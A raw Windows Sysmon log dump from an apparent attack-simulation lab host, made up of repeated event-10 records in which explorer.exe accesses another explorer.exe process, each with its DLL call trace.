16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 